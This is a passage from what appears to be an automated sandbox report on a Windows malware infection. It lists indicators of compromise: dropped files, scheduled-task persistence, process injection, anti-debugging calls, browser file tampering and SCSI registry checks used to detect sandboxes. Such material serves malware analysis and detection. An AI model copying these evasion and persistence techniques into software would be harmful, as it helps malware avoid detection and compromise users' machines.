C:\Windows\system32\GroupPolicy\gpt.ini CNvEnVd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_34F3913AF70BE4077DF40170FF89FAE0 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA gCRvjRb.exe File opened for modification C:\Windows\System32\Tasks\xSbgDCImQNdWYmB2 svchost.exe File opened for modification C:\Windows\System32\Tasks\spuMTubdtfoo svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_34F3913AF70BE4077DF40170FF89FAE0 gCRvjRb.exe File opened for modification C:\Windows\System32\Tasks\spummIlXAdpq svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\PDC.pdb WerFault.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_40AA5706A3E9B7051D7711C8169350B1 gCRvjRb.exe File opened for modification C:\Windows\System32\Tasks\rRYXbmmYjIvrG2 svchost.exe File opened for modification C:\Windows\System32\Tasks\lDWDrPZYJQBuPmKYQ svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gCRvjRb.exe File opened for modification C:\Windows\System32\Tasks\DVpMShOGhTVXDiVCZ2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\wovemSUpOFDwVyMam svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 gCRvjRb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 81C722454A70B378 svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gCRvjRb.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol CNvEnVd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 gCRvjRb.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
6650495.exe5581443.scr_zmz9h_0oO1LiMAufsS4G9Hx.exea3nSYK3QiDj60t0XJFF7UlrQ.exerePWGAeA9gG8Y413QzXTBROs.exe3j37Icfa8ZkdKtGcGgFo5hHI.exeEWtGNadfMrzbtpsBi9aWUtQT.exejtW2SlgNdt8N1bR8cmz07mY3.exewwl.exewwi.exeAYcoRdCUFo3EVft6taKBoNmp.exemG10dmTajtqdi6FuJgXzFaN5.exeAA61.exeBF24.exeC3F8.exepid process 1872 6650495.exe 1968 5581443.scr 7388 _zmz9h_0oO1LiMAufsS4G9Hx.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7560 rePWGAeA9gG8Y413QzXTBROs.exe 7452 3j37Icfa8ZkdKtGcGgFo5hHI.exe 7584 EWtGNadfMrzbtpsBi9aWUtQT.exe 8084 jtW2SlgNdt8N1bR8cmz07mY3.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 9036 wwl.exe 8920 wwi.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7884 AYcoRdCUFo3EVft6taKBoNmp.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7568 mG10dmTajtqdi6FuJgXzFaN5.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 10176 AA61.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 9600 BF24.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 9568 C3F8.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe -
Suspicious use of SetThreadContext 20 IoCs
Processes:
Thu203cdb52ef3c6580d.exesvchost.exeThu20a5f7ccaa78.exeXBR5d0OipcZIAALv0Ds4mA_b.exe7XVoCk2M083myR3PeWtGmlcK.exedX9c0VLsY6QZmDeHO24bcfz5.exeq8G7pt2bO5fMdxqZP9uX1JCU.exeq8G7pt2bO5fMdxqZP9uX1JCU.exemG10dmTajtqdi6FuJgXzFaN5.exe8E7A.exe9794.exeWMIADAP.EXEConhost.exeBAC0.exechrome.exe1515.exebuild2.exebuild3.exeservices64.exeaeghuggdescription pid process target process PID 4700 set thread context of 640 4700 Thu203cdb52ef3c6580d.exe Thu203cdb52ef3c6580d.exe PID 2684 set thread context of 5036 2684 svchost.exe svchost.exe PID 420 set thread context of 2364 420 Thu20a5f7ccaa78.exe Thu20a5f7ccaa78.exe PID 7252 set thread context of 8624 7252 XBR5d0OipcZIAALv0Ds4mA_b.exe XBR5d0OipcZIAALv0Ds4mA_b.exe PID 8068 set thread context of 9056 8068 7XVoCk2M083myR3PeWtGmlcK.exe 7XVoCk2M083myR3PeWtGmlcK.exe PID 7816 set thread context of 6988 7816 dX9c0VLsY6QZmDeHO24bcfz5.exe dX9c0VLsY6QZmDeHO24bcfz5.exe PID 7576 set thread context of 9168 7576 q8G7pt2bO5fMdxqZP9uX1JCU.exe q8G7pt2bO5fMdxqZP9uX1JCU.exe PID 9168 set thread context of 6200 9168 q8G7pt2bO5fMdxqZP9uX1JCU.exe q8G7pt2bO5fMdxqZP9uX1JCU.exe PID 7568 set thread context of 4428 7568 mG10dmTajtqdi6FuJgXzFaN5.exe mG10dmTajtqdi6FuJgXzFaN5.exe PID 9656 set thread context of 10192 9656 8E7A.exe 8E7A.exe PID 9784 set thread context of 7688 9784 9794.exe 9794.exe PID 7540 set thread context of 4088 7540 WMIADAP.EXE 30m_VqBd5yyKL_Q269RMiiX0.exe PID 9828 set thread context of 8028 9828 Conhost.exe 1515.exe PID 9624 set thread context of 5256 9624 BAC0.exe BAC0.exe PID 9748 set thread context of 7716 9748 chrome.exe E761.exe PID 10288 set thread context of 4576 10288 1515.exe 1515.exe PID 12852 set thread context of 10840 12852 build2.exe build2.exe PID 5128 set thread context of 11364 5128 build3.exe build3.exe PID 7004 set thread context of 6764 7004 services64.exe explorer.exe PID 10820 set thread context of 16396 10820 aeghugg aeghugg -
Drops file in Program Files directory 64 IoCs
Processes:
ultramediaburner.tmpmd8_8eus.exeIDownload.tmpUSNydSz.exemsiexec.exeChmenka.exegCRvjRb.exe___YHDG34.exe1LmD_gnw4q8R9TJXTApySnvK.exeIDownload.App.execmd.exeXgjnLxbzwVfuidtVtZ1khfTK.exedescription ioc process File created C:\Program Files (x86)\UltraMediaBurner\is-GGRPB.tmp ultramediaburner.tmp File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File created C:\Program Files (x86)\FAROrqqmwDJuC\MSPKFlJ.xml USNydSz.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe.config Chmenka.exe File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Spider.dll IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\MyDownloader.Core.dll IDownload.tmp File created C:\Program Files (x86)\IDownload\is-C0KBH.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-FOVUT.tmp IDownload.tmp File created C:\Program Files (x86)\xmhVlMznYVRU2\SCroPrS.xml gCRvjRb.exe File created C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe ___YHDG34.exe File created C:\Program Files (x86)\Company\Dohetishesi.exe Chmenka.exe File opened for modification C:\Program Files (x86)\IDownload\ICSharpCode.SharpZipLib.dll IDownload.tmp File created C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\tRpflWT.dll USNydSz.exe File created C:\Program Files (x86)\SZbnkDASJEUn\MGPoNjg.dll USNydSz.exe File created C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe.config ___YHDG34.exe File created C:\Program Files (x86)\UltraMediaBurner\is-0VKQ6.tmp ultramediaburner.tmp File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\Company\Dohetishesi.exe.config Chmenka.exe File created C:\Program Files (x86)\IDownload\is-TCKRT.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-O40PU.tmp IDownload.tmp File created C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\pNKBWUu.xml USNydSz.exe File created C:\Program Files (x86)\Windows Media Player\Qynuloqulae.exe.config ___YHDG34.exe File opened for modification C:\Program Files (x86)\IDownload\unins000.dat IDownload.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gCRvjRb.exe File created C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\DZjqpXj.dll gCRvjRb.exe File created C:\Program Files (x86)\FAROrqqmwDJuC\rzJfHCg.xml gCRvjRb.exe File created C:\Program Files (x86)\xmhVlMznYVRU2\qGspXwE.xml USNydSz.exe File created C:\Program Files (x86)\FAROrqqmwDJuC\qHKKQqG.dll USNydSz.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1LmD_gnw4q8R9TJXTApySnvK.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe Chmenka.exe File created C:\Program Files (x86)\IDownload\is-V4VBI.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-9F8S8.tmp IDownload.tmp File opened for modification C:\Program Files (x86)\IDownload\downloads.xml IDownload.App.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gCRvjRb.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1LmD_gnw4q8R9TJXTApySnvK.exe File created C:\Program Files (x86)\IDownload\is-J3LPS.tmp IDownload.tmp File created C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\dXZipRN.xml gCRvjRb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja gCRvjRb.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files\Google\Chrome\Application\93.0.4577.63\resources.pak cmd.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File opened for modification C:\Program Files (x86)\IDownload\IDownload.App.exe IDownload.tmp File created C:\Program Files (x86)\IDownload\is-4U2E2.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-BET20.tmp IDownload.tmp File created C:\Program Files (x86)\IDownload\is-J0I2Q.tmp IDownload.tmp File created C:\Program Files (x86)\TdgVoScrU\wMaCDE.dll USNydSz.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi USNydSz.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe XgjnLxbzwVfuidtVtZ1khfTK.exe File created C:\Program Files (x86)\TdgVoScrU\XWmwawu.xml gCRvjRb.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe XgjnLxbzwVfuidtVtZ1khfTK.exe File created C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi gCRvjRb.exe File created C:\Program Files (x86)\TdgVoScrU\rBozWuM.xml USNydSz.exe File created C:\Program Files (x86)\SZbnkDASJEUn\bTnncMO.dll gCRvjRb.exe File created C:\Program Files (x86)\Windows Media Player\Qynuloqulae.exe ___YHDG34.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini XgjnLxbzwVfuidtVtZ1khfTK.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
MicrosoftEdge.exeIDownload.App.exeMicrosoftEdgeCP.exemsiexec.exeExplorer.EXEMicrosoftEdgeCP.exeWerFault.exesvchost.exeMicrosoftEdge.exeMicrosoftEdge.exereg.exeschtasks.exeschtasks.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeschtasks.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\assembly IDownload.App.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File opened for modification C:\Windows\Installer\MSI4B43.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C9A.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI8C2F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F8C.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI6360.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6640.tmp msiexec.exe File opened for modification C:\Windows\INF\display.PNF WerFault.exe File opened for modification C:\Windows\Tasks\xSbgDCImQNdWYmB.job svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Tasks\bEwGusBEGbIeKSSfjR.job svchost.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIB679.tmp msiexec.exe File opened for modification C:\Windows\Installer\298ac.msi msiexec.exe File created C:\Windows\Tasks\bEwGusBEGbIeKSSfjR.job reg.exe File opened for modification C:\Windows\Installer\MSI8FBC.tmp msiexec.exe File created C:\Windows\Installer\298af.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI5F49.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9B1A.tmp msiexec.exe File created C:\Windows\INF\adp80xx.PNF WerFault.exe File opened for modification C:\Windows\Installer\MSI74A9.tmp msiexec.exe File created C:\Windows\Tasks\xSbgDCImQNdWYmB.job schtasks.exe File opened for modification C:\Windows\Installer\MSIA60A.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\INF\netrasa.PNF WerFault.exe File opened for modification C:\Windows\Installer\MSI9FAF.tmp msiexec.exe File created C:\Windows\assembly\Desktop.ini IDownload.App.exe File created C:\Windows\Tasks\wovemSUpOFDwVyMam.job schtasks.exe File created C:\Windows\Tasks\lDWDrPZYJQBuPmKYQ.job schtasks.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI892F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI97FC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA2DD.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Installer\298ac.msi msiexec.exe File opened for modification C:\Windows\assembly\Desktop.ini IDownload.App.exe File opened for modification C:\Windows\Tasks\wovemSUpOFDwVyMam.job svchost.exe File opened for modification C:\Windows\Tasks\wovemSUpOFDwVyMam.job schtasks.exe File opened for modification C:\Windows\Installer\MSI8AA7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8D88.tmp msiexec.exe File created C:\Windows\INF\amdsata.PNF WerFault.exe File opened for modification C:\Windows\INF\disk.PNF WerFault.exe File opened for modification C:\Windows\Installer\MSI9CD0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA84E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI7D45.tmp msiexec.exe File created C:\Windows\LiveKernelReports\PDCRevocation\PDCRevocation-20210916-2117.dmp WerFault.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\xSbgDCImQNdWYmB.job schtasks.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\INF\amdsbs.PNF WerFault.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Tasks\lDWDrPZYJQBuPmKYQ.job svchost.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\INF\3ware.PNF WerFault.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1372 1788 WerFault.exe Thu2025d6674aed72ba.exe 3496 896 WerFault.exe setup.exe 1248 896 WerFault.exe setup.exe 4448 1788 WerFault.exe Thu2025d6674aed72ba.exe 508 896 WerFault.exe setup.exe 2140 1788 WerFault.exe Thu2025d6674aed72ba.exe 4520 1788 WerFault.exe Thu2025d6674aed72ba.exe 4372 896 WerFault.exe setup.exe 4692 896 WerFault.exe setup.exe 1248 896 WerFault.exe setup.exe 5092 896 WerFault.exe setup.exe 4456 1788 WerFault.exe Thu2025d6674aed72ba.exe 5228 4956 WerFault.exe 8684174.scr 5556 3860 WerFault.exe 4873306.exe 5604 1352 WerFault.exe BearVpn 3.exe -
Checks SCSI registry key(s) 3 TTPs 39 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Thu20bc9ea26f.exeWerFault.exectghuggHcY5k_KrNgbxj3FPdJLM6vgP.exedX9c0VLsY6QZmDeHO24bcfz5.exe8E7A.exectghuggaeghuggdescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu20bc9ea26f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004 WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu20bc9ea26f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HcY5k_KrNgbxj3FPdJLM6vgP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\ WerFault.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dX9c0VLsY6QZmDeHO24bcfz5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu20bc9ea26f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dX9c0VLsY6QZmDeHO24bcfz5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dX9c0VLsY6QZmDeHO24bcfz5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8E7A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aeghugg Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004\ WerFault.exe Key value queried 